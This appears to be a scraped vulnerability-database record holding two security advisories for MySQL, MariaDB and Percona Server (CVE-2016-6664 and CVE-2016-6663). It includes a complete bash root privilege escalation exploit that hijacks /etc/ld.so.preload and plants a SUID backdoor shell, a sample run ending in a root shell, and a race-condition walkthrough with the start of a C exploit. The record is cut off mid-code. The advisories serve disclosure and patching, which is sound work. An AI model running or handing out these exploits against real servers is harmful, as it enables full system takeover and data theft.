\nMariaDB: \n \n\"MariaDB is one of the most popular database servers in the world. \nIt's made by the original developers of MySQL and guaranteed to stay open source. \nNotable users include Wikipedia, WordPress.com and Google. \n \nMariaDB turns data into structured information in a wide array of applications, \nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \nstorage engines, plugins and many other tools make it very versatile for a wide \nvariety of use cases.\" \n \nhttps://mariadb.org/about/ \n \n-- \n \nPerconaDB: \n \n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \ndrop-in replacement for MySQL that provides superior performance, scalability \nand instrumentation. 
\nWith over 3,000,000 downloads, Percona Server's self-tuning algorithms and support \nfor extremely high-performance hardware delivers excellent performance and reliability.\" \n \nhttps://www.percona.com/software/mysql-database/percona-server \n \n \nIII. INTRODUCTION \n------------------------- \n \nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected \nby a privilege escalation vulnerability which can let attackers who have \ngained access to mysql system user to further escalate their privileges \nto root user allowing them to fully compromise the system. \nThe vulnerability stems from unsafe file handling of error logs and \nother files. \n \n \nIV. DESCRIPTION \n------------------------- \n \nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB \ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory. \n \nThe permissions on the file and directory look as follows: \n \nroot@trusty:/var/lib/mysql# ls -la /var/log/mysql \ntotal 468 \ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . \ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. \n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log \n \nroot@trusty:/var/lib/mysql# ls -lad /var/log/mysql \ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql \n \n \nThe mysqld_safe wrapper that is normally used for starting the MySQL daemon and \ncreating/reopening the error.log performs certain unsafe file operations that \nmay allow attackers to gain root privileges. \n \nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \nprocess and performs a restart in case of the process failure. \nThe restart involves re-creation of the error.log file if syslog logging has \nnot been configured instead of error log files (file-based logging is the \ndefault setting on most installations). \n \n \n--------[ mysqld_safe ]-------- \n[...] 
\n \nwhile true \ndo \nrm -f \"$pid_file\" # Some extra safety \n \nstart_time=`date +%M%S` \n \neval_log_error \"$cmd\" \n \nif [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then \ntouch \"$err_log\" # hypothetical: log was renamed but not \nchown $user \"$err_log\" # flushed yet. we'd recreate it with \nchmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set \nfi # it up correctly while we can! \n \n[...] \n \n------------------------------- \n \nAs can be seen, the error.log file is created (touch) and chowned to the user \nrunning the mysqld daemon (typically 'mysql'). \n \nThe operation is vulnerable to a symlink attack. \n \nAttackers who obtained access to the mysql account through the CVE-2016-6663 \nvulnerability described at: \n \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \nand could therefore easily remove the error.log file and replace it \nwith a symlink to an arbitrary system file and escalate privileges. \n \nThe privilege escalation could be triggered instantly (without the need to wait \nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \nkilling the mysqld child process (launched by the mysqld_safe wrapper). \n \nWhen the mysqld process gets terminated, the wrapper will then re-iterate the \nloop shown above and immediately create a mysql-owned file in the location \nspecified by the attacker in the symlink thus allowing attackers to quickly \nescalate their privileges. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n-------[ mysql-chowned.sh ]------ \n \n#!/bin/bash -p \n# \n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \n# mysql-chowned.sh (ver. 
1.0) \n# \n# CVE-2016-6664 / OCVE-2016-5617 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# dawid[at]legalhackers.com \n# \n# https://legalhackers.com \n# \n# Follow https://twitter.com/dawid_golunski for updates on this advisory. \n# \n# This PoC exploit allows attackers to (instantly) escalate their privileges \n# from mysql system account to root through unsafe error log handling. \n# The exploit requires that file-based logging has been configured (default). \n# To confirm that syslog logging has not been enabled instead use: \n# grep -r syslog /etc/mysql \n# which should return no results. \n# \n# This exploit can be chained with the following vulnerability: \n# CVE-2016-6663 / OCVE-2016-5616 \n# which allows attackers to gain access to mysql system account (mysql shell). \n# \n# In case database server has been configured with syslog you may also use: \n# CVE-2016-6662 as an alternative to this exploit. \n# \n# Usage: \n# ./mysql-chowned.sh path_to_error.log \n# \n# \n# See the full advisory for details at: \n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n# \n# Video PoC: \n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. \n# \n \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/mysqlrootsh\" \nPRIVESCLIB=\"/tmp/privesclib.so\" \nPRIVESCSRC=\"/tmp/privesclib.c\" \nSUIDBIN=\"/usr/bin/sudo\" \n \nfunction cleanexit { \n# Cleanup \necho -e \"\\n[+] Cleaning up...\" \nrm -f $PRIVESCSRC \nrm -f $PRIVESCLIB \nrm -f $ERRORLOG \ntouch $ERRORLOG \nif [ -f /etc/ld.so.preload ]; then \necho -n > /etc/ld.so.preload \nfi \necho -e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \n \nfunction ctrl_c() { \necho -e \"\\n[+] Active exploitation aborted. 
Remember you can use -deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n \n#intro \necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\" \necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\" \n \n# Args \nif [ $# -lt 1 ]; then \necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\" \necho -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\" \nexit 3 \nfi \n \n# Priv check \n \necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\" \nid | grep -q mysql \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\" \nexit 3 \nfi \n \n# Set target paths \nERRORLOG=\"$1\" \nif [ ! -f $ERRORLOG ]; then \necho -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\" \nexit 3 \nfi \necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\" \n \n# [ Active exploitation ] \n \ntrap ctrl_c INT \n# Compile privesc preload library \necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\" \ncat <<_solibeof_>$PRIVESCSRC \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <dlfcn.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n \nuid_t geteuid(void) { \nstatic uid_t (*old_geteuid)(); \nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\"); \nif ( old_geteuid() == 0 ) { \nchown(\"$BACKDOORPATH\", 0, 0); \nchmod(\"$BACKDOORPATH\", 04777); \n//unlink(\"/etc/ld.so.preload\"); \n} \nreturn old_geteuid(); \n} \n_solibeof_ \n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\" \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] 
Failed to compile the privesc lib $PRIVESCSRC.\" \ncleanexit 2; \nfi \n \n \n# Prepare backdoor shell \ncp $BACKDOORSH $BACKDOORPATH \necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\" \n \n# Safety check \nif [ -f /etc/ld.so.preload ]; then \necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\" \nexit 2 \nfi \n \n# Symlink the log file to /etc \nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\" \n \n# Wait for MySQL to re-open the logs \necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\" \nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER \nif [ \"$THE_ANSWER\" = \"y\" ]; then \necho -e \"Got it. Executing 'killall mysqld' now...\" \nkillall mysqld \nfi \nwhile :; do \nsleep 0.1 \nif [ -f /etc/ld.so.preload ]; then \necho $PRIVESCLIB > /etc/ld.so.preload \nrm -f $ERRORLOG \nbreak; \nfi \ndone \n \n# /etc/ dir should be owned by mysql user at this point \n# Inject the privesc.so shared library to escalate privileges \necho $PRIVESCLIB > /etc/ld.so.preload \necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\" \necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\" \necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\" \nchmod 755 /etc/ld.so.preload \n \n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) \necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\" \nsudo 2>/dev/null >/dev/null \n \n#while :; do \n# sleep 0.1 \n# ps aux | grep mysqld | grep -q 'log-error' \n# if [ $? 
-eq 0 ]; then \n# break; \n# fi \n#done \n \n# Check for the rootshell \nls -l $BACKDOORPATH \nls -l $BACKDOORPATH | grep rws | grep -q root \nif [ $? -eq 0 ]; then \necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\" \necho -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\" \nelse \necho -e \"\\n[!] Failed to get root\" \ncleanexit 2 \nfi \n \n \n# Execute the rootshell \necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\" \n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\" \n$BACKDOORPATH -p \n \n# Job done. \ncleanexit 0 \n \n \n \n------------EOF------------------ \n \n \nExample run \n~~~~~~~~~~~~~~~ \n \nmysql_suid_shell.MYD-4.3$ whoami \nmysql \n \nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server \niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server \niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries \n \nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \n \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0) \n \nCVE-2016-6664 / OCVE-2016-5617 \n \nDiscovered and coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n[+] Starting the exploit as \nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) \n \n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err \n \n[+] Compiling the privesc shared library (/tmp/privesclib.c) \n \n[+] Backdoor/low-priv shell installed at: \n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \n[+] Symlink created at: \nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload \n \n[+] Waiting for MySQL to re-open the logs/MySQL service restart... \nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y \nGot it. Executing 'killall mysqld' now... 
\n \n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload \n \n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload \n \n[+] The /etc/ld.so.preload file now contains: \n/tmp/privesclib.so \n \n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! \n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \n[+] Rootshell got assigned root SUID perms at: \n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \nGot root! The database server has been ch-OWNED ! \n \n[+] Spawning the rootshell /tmp/mysqlrootsh now! \n \nmysqlrootsh-4.3# whoami \nroot \n \nmysqlrootsh-4.3# exit \nexit \n \n[+] Cleaning up... \n \n[+] Job done. Exiting with code 0 \n \n \n \nVideo PoC: \n~~~~~~~~~~~~ \n \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAlthough the severity of this issue is lower on its own (attackers need to \ngain access to the mysql system user), the vulnerability could easily be combined \nwith the CVE-2016-6663 issue. \nThe combination of the two would effectively allow low privileged local \ndatabase users to escalate their system privileges to the root system account and \nallow them to fully compromise the server, which increases the severity of this \nissue. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nMariaDB \nAll current \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \nVIII. SOLUTION \n------------------------- \n \nVendors have released patches after private disclosure. \nUpdate to the latest version of your DBMS. \n \nUntil the update can be applied, note that the vulnerable touch/chown/chmod \nsequence in mysqld_safe only runs when file-based error logging is in use \n(the $want_syslog -eq 0 test in the loop shown above); configuring mysqld_safe \nto log to syslog instead removes this particular path (the PoC itself checks \nfor this with 'grep -r syslog /etc/mysql'). This is a workaround rather than a \nfix, since the wrapper's unsafe handling of 'other files' mentioned in the \nintroduction is not addressed by it. \n \n \nIX. 
REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nThis advisory: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \nExploit source code: \nhttp://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh \n \nRelated mysql vulnerabilities discovered by the author of this advisory that can be chained with \nthe CVE-2016-6664 vulnerability: \n \nCVE-2016-6663: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \nCVE-2016-6662: \nhttp://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html \n \n \nVideo PoC: \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \nCVE-2016-6664 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 \n \nOracle CPU: \nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL \n \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \n \nhttp://legalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n01.11.2016 - Advisory released \n \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. 
\n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139491/mysql-chowned.txt"}, {"lastseen": "2016-12-05T22:22:18", "description": "", "published": "2016-11-02T00:00:00", "type": "packetstorm", "title": "MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-02T00:00:00", "id": "PACKETSTORM:139476", "href": "https://packetstormsecurity.com/files/139476/MySQL-MariaDB-PerconaDB-Privilege-Escalation-Race-Condition.html", "sourceData": "`============================================= \n- Release date: 01.11.2016 \n- Discovered by: Dawid Golunski \n- Severity: Critical \n- CVE-2016-6663 / OCVE-2016-5616 \n- http://legalhackers.com \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nMySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition \n \n \nMariaDB \n< 5.5.52 \n< 10.1.18 \n< 10.0.28 \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \nII. BACKGROUND \n------------------------- \n \n \nMySQL: \n \n\"MySQL is the world's most popular open source database. 
\nWhether you are a fast growing web property, technology ISV or large \nenterprise, MySQL can cost-effectively help you deliver high performance, \nscalable database applications.\" \n \n\"Many of the world's largest and fastest-growing organizations including \nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time \nand money powering their high-volume Web sites, business-critical systems and \npackaged software.\" \n \nhttp://www.mysql.com/products/ \nhttp://www.mysql.com/why-mysql/ \n \n-- \n \nMariaDB: \n \n\"MariaDB is one of the most popular database servers in the world. \nIt's made by the original developers of MySQL and guaranteed to stay open source. \nNotable users include Wikipedia, WordPress.com and Google. \n \nMariaDB turns data into structured information in a wide array of applications, \nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \nstorage engines, plugins and many other tools make it very versatile for a wide \nvariety of use cases.\" \n \nhttps://mariadb.org/about/ \n \n-- \n \nPerconaDB: \n \n\"Percona Server for MySQL® is a free, fully compatible, enhanced, open source \ndrop-in replacement for MySQL that provides superior performance, scalability \nand instrumentation. \nWith over 3,000,000 downloads, Percona Server's self-tuning algorithms and support \nfor extremely high-performance hardware delivers excellent performance and reliability.\" \n \nhttps://www.percona.com/software/mysql-database/percona-server \n \n \nIII. INTRODUCTION \n------------------------- \n \nIndependent research has revealed a race condition vulnerability which is \npresent in MySQL, MariaDB and PerconaDB databases. 
\n \nThe vulnerability can allow a local system user with access to the affected \ndatabase in the context of a low-privileged account (CREATE/INSERT/SELECT grants) \nto escalate their privileges and execute arbitrary code as the database system \nuser (typically 'mysql'). \n \nSuccessful exploitation would allow an attacker to gain access to all of the \ndatabases stored on the affected database server. \n \nThe obtained level of access upon the exploitation, could be chained with \nthe other privilege escalation vulnerabilities discovered by the author of \nthis advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges \nfrom mysql user to root user and thus allow attackers to fully compromise the \ntarget server. \n \n \nIV. DESCRIPTION \n------------------------- \n \n \nTable locations \n~~~~~~~~~~~~~~~~~ \n \nMySQL-based databases allow users with CREATE table privilege to optionally \nspecify a disk path of the directory where the table will be stored via a DATA \nDIRECTORY parameter in the CREATE statement. \n \nUsers who have access to a database account with CREATE grant could create a \ntable under a directory that they can control. 
For example: \n \nattacker@debian:~$ mkdir /tmp/disktable \nattacker@debian:~$ chmod 777 /tmp/disktable/ \nattacker@debian:~$ ls -ld /tmp/disktable/ \ndrwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ \n \nA user could then place a table within the directory with the following SQL \nstatement: \n \nmysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; \n \nwhich would result in creating the following table file: \n \nattacker@debian:~$ ls -l /tmp/disktable/ \ntotal 0 \n-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD \n \n \nRace Condition \n~~~~~~~~~~~~~~~~~ \n \nObserving file operations performed on the table stored within the directory, \nit was discovered that REPAIR TABLE SQL statement which is available to \nlow-privileged users with SELECT/CREATE/INSERT grants, performed unsafe \noperations on temporary files created during the table repair process. \n \nExecuting the statement: \n \nmysql> REPAIR TABLE `poctab1`; \n+----------------+--------+----------+----------+ \n| Table | Op | Msg_type | Msg_text | \n+----------------+--------+----------+----------+ \n| testdb.poctab1 | repair | status | OK | \n+----------------+--------+----------+----------+ \n \nwould result in execution of the following system calls: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] open(\"/tmp/disktable/poctab1.MYD\", O_RDWR) = 65 \n[pid 1463] access(\"./testdb/poctab1.TRG\", F_OK) = -1 ENOENT (No such file or directory) \n[pid 1463] lseek(65, 0, SEEK_CUR) = 0 \n[pid 1463] lseek(65, 0, SEEK_END) = 0 \n[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 \n[pid 1463] open(\"/tmp/disktable/poctab1.TMD\", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 \n[pid 1463] lseek(65, 0, SEEK_END) = 0 \n[pid 1463] lseek(64, 0, SEEK_END) = 1024 \n[pid 1463] close(65) = 0 \n[pid 1463] close(66) = 0 \n[pid 1463] lstat(\"/tmp\", {st_mode=S_IFDIR|S_ISVTX|0777, 
st_size=4096, ...}) = 0 \n[pid 1463] lstat(\"/tmp/disktable\", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] stat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0 \n[pid 1463] chown(\"/tmp/disktable/poctab1.TMD\", 110, 115) = 0 \n[pid 1463] unlink(\"/tmp/disktable/poctab1.MYD\") = 0 \n[pid 1463] rename(\"/tmp/disktable/poctab1.TMD\", \"/tmp/disktable/poctab1.MYD\") = 0 \n \n \nThe first call: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n \nwas found to check file permissions of poctab1.MYD table which are then copied with chmod() \nto the newly created poctab1.TMD temporary file containing the repaired table. \n \nThe code is vulnerable to Race Condition between the call: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n \nand \n \n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0 \n \n \nIf an attacker managed to unlink the temporary table poctab1.TMD and replace it \nwith a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), \nthey would be able to apply arbitrary permissions on the data directory. \nThe attacker would be able to control the set of permissions by pre-setting them on \npoctab1.MYD file before executing the REPAIR TABLE statement. \nFor example, by setting the permissions of poctab1.MYD to 777 the data directory \nwould become readable and writable to the attacker. \n \n \nObtaining mysql-suid shell \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nApart from gaining access to arbitrary mysql files, the attacker could also \nachieve arbitrary code execution in the context of mysql user (mysql shell). 
\n \nThis could be done by first pre-setting permissions on poctab1.MYD to 04777 \n(suid), and winning the race so that the permissions get applied on a copy \nof a bash shell file through the vulnerable chmod() call, effectively creating \na shell that elevates their permissions after execution. \n \nThere is only one problem. Their suid shell would still be owned by the \nattacker's user id and not the 'mysql' user, so the setuid bit would gain nothing. \n \nTo elevate their privileges, the attacker would need to copy the bash shell to a \nmysql-owned table file, as those are owned by the mysql user. However mysql table \nfiles are not writable by other users, making it impossible for the attacker to save \nthe shell. \n \nThis could be bypassed if the attacker created a specially crafted directory \nwith the setgid bit set (chmod g+s) - which makes new files created in it inherit \nthe directory's group rather than the creator's - and then created a second table \nnamed 'poctab2' as follows: \n \nattacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ \nattacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ \ndrwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ \n \nmysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; \nQuery OK, 0 rows affected (0.00 sec) \n \nattacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ \ntotal 0 \n-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD \n-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD \n \nAs we can see, the poctab2.MYD table (thanks to the setgid bit - the 's' in the \ngroup permissions of the disktable directory) has 'mysql' as the owner but 'attacker' \nas the group, and the table file is group-writable (rw-rw----). \nTherefore, the attacker would now be able to copy /bin/bash over the poctab2.MYD file \nand preserve the file owner. \n \nFinally, they could exploit the Race Condition again and have SUID + exec \npermissions applied on poctab2.MYD, which would then allow them to execute the suid \nshell with elevated privileges of the mysql user. 
\n \n \nFrom mysql to root \n~~~~~~~~~~~~~~~~~~~~~~~ \n \nAfter obtaining a mysql suid shell, attackers could then exploit one of the \nother MySQL vulnerabilities discovered by the author of this advisory: \n \nCVE-2016-6662 \nor \nCVE-2016-6664 (OCVE-2016-5617) \n \nto escalate their privileges from mysql user to root system user. \n \nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n------------------[ mysql-privesc-race.c ]-------------------- \n \n/* \n \nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit \nmysql-privesc-race.c (ver. 1.0) \n \nCVE-2016-6663 / OCVE-2016-5616 \n \nDiscovered/Coded by: \n \nDawid Golunski \ndawid[at]legalhackers.com \nhttps://legalhackers.com \n \nFollow https://twitter.com/dawid_golunski for updates on this advisory. \n \n \nCompile: \ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient \n \nNote: \n* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads) \n \n* For testing purposes only. Do no harm. 
\n \nFull advisory URL: \nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \n \nVideo PoC: \nhttps://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n*/ \n \n \n \n \n#include <fcntl.h> \n#include <grp.h> \n#include <mysql.h> \n#include <pwd.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/inotify.h> \n#include <sys/stat.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <time.h> \n#include <unistd.h> \n \n \n#define EXP_PATH \"/tmp/mysql_privesc_exploit\" \n#define EXP_DIRN \"mysql_privesc_exploit\" \n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\" \n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\" \n \n#define SUID_SHELL EXP_PATH \"/mysql_suid_shell.MYD\" \n \n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary \n \nMYSQL *conn; // DB handles \nMYSQL_RES *res; \nMYSQL_ROW row; \n \nunsigned long cnt; \n \n \nvoid intro() { \n \nprintf( \n\"\\033[94m\\n\" \n\"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\" \n\"mysql-privesc-race.c (ver. 1.0)\\n\\n\" \n\"CVE-2016-6663 / OCVE-2016-5616\\n\\n\" \n\"For testing purposes only. 
Do no harm.\\n\\n\" \n\"Discovered/Coded by:\\n\\n\" \n\"Dawid Golunski \\n\" \n\"http://legalhackers.com\" \n\"\\033[0m\\n\\n\"); \n \n} \n \nvoid usage(char *argv0) { \nintro(); \nprintf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0); \n} \n \nvoid mysql_cmd(char *sql_cmd, int silent) { \n \nif (!silent) { \nprintf(\"%s \\n\", sql_cmd); \n} \nif (mysql_query(conn, sql_cmd)) { \nfprintf(stderr, \"%s\\n\", mysql_error(conn)); \nexit(1); \n} \nres = mysql_store_result(conn); \nif (res>0) mysql_free_result(res); \n \n} \n \n \nint main(int argc,char **argv) \n{ \n \nint randomnum = 0; \nint io_notified = 0; \nint myd_handle; \nint wpid; \nint is_shell_suid=0; \npid_t pid; \nint status; \nstruct stat st; \n/* io notify */ \nint fd; \nint ret; \nchar buf[4096] __attribute__((aligned(8))); \nint num_read; \nstruct inotify_event *event; \n/* credentials */ \nchar *user = argv[1]; \nchar *password = argv[2]; \nchar *db_host = argv[3]; \nchar *database = argv[4]; \n \n \n// Disable buffering of stdout \nsetvbuf(stdout, NULL, _IONBF, 0); \n \n// Get the params \nif (argc!=5) { \nusage(argv[0]); \nexit(1); \n} \nintro(); \n// Show initial privileges \nprintf(\"\\n[+] Starting the exploit as: \\n\"); \nsystem(\"id\"); \n \n// Connect to the database server with provided credentials \nprintf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host); \nconn = mysql_init(NULL); \nif (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { \nfprintf(stderr, \"%s\\n\", mysql_error(conn)); \nexit(1); \n} \n \n// Prepare tmp dir \nprintf(\"\\n[+] Creating exploit temp directory %s\\n\", 